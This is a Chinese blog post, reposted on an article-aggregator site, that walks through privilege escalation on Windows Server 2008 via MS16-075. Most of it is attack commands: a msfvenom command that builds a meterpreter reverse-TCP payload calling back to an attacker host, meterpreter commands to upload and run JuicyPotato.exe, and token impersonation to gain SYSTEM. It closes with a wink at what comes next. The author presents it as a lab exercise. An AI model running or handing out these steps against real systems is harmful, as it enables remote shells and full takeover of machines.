ms16075提权Windows Server 2008
程序员文章站
2022-07-15 11:07:10
...
欢迎大家去我博客查看原文:http://www.xpshuai.cn/posts/29481/
光看网上的文章是不够的,还是要多动手才行
ms16-075漏洞简介
Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。
漏洞详情,请戳这里
开始动手
1.假设是msfvenom生成木马,目标执行了,监听会话,获得meterpreter会话权限
msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.0.103 lport=4444 -f exe > shell.exe
2.先看一下当前权限(确保我没有作弊)
3.查看系统信息,并导出
# (进入cmd)
shell
chcp 65001 # 将编码格式改为utf-8中文
systeminfo >> c:\out.txt 将系统信息输出到out.txt文件
4.在meterpreter把结果文件下载到本地
download D:\\xxxx\\upload\\out.txt /tmp/out.txt
5.这里选择Windows-Exploit-Suggeste
提权辅助工具,对结果文件在本地进行分析, 查找系统未打补丁有哪些
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -i out.txt -d 2020-05-09-mssb.xls -l # -i是systeminfo的结果文件
可以看到可能存在ms16-075漏洞
6.开始验证
# 上传ms16-075的exp: JuicyPotato.exe至靶机
upload /root/Desktop/JuicyPotato.exe C:\\
execute -cH -f C:\\JuicyPotato.exe # 执行poc(前面已经把poc上传到目标了), 创建新的进程
impersonate_token "NT AUTHORITY\\SYSTEM" # 窃取, 假冒目标主机上的可用令牌
7.查看当前权限,提取成功
getuid # 查看当前权限
8.后面的事情,嘿嘿你懂得
这里只是没有防护的情况下的一次简单实验,有点简陋有点水
推荐阅读
-
学生信息管理系统——配置windows防火墙允许访问SQL Server 2008服务器
-
WannaCry勒索修补补丁KB4012598下载地址:适用Windows Server 2003/2008等系统
-
Windows Server 2008 R2修改SID的方法与注意事项
-
Windows Server 2008 R2上安装WebsitePanel的方法
-
Nagios监控Windows Server 2008配置方法
-
Windows Server 2008 r2 安装Zend Optimizer教程
-
在Windows Server 2008 R2上安装IIS服务
-
Windows Server 2008 R2(x64) IIS7+PHP5.6.30(FastCGI)环境搭建
-
WIN2008 R2 Active Directory 之一 部署企业中第一台Windows Server 2008 R2域控制器
-
Windows Server 2008 R2远程设置选项灰色解决方法